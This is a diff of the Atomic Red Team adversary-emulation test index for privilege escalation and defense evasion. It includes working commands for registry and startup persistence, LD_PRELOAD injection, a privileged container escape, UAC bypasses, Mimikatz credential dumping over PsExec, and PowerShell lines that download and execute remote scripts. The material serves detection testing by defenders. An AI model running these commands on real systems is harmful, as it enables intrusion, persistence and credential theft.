@@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview 
@@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: 
@@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod -' + ' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: 
@@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true 
@@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' 
@@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
@@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1547.001: 
@@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | 
@@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: 
@@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1547.009: 
@@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true 
@@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1055.014: technique: 
@@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) -' + ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'cp /bin/ls #{file_to_pad} -' + ' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} -' + ' cleanup_command: 'rm #{file_to_pad} -' + ' name: sh T1542.003: technique: 
@@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task 
@@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' 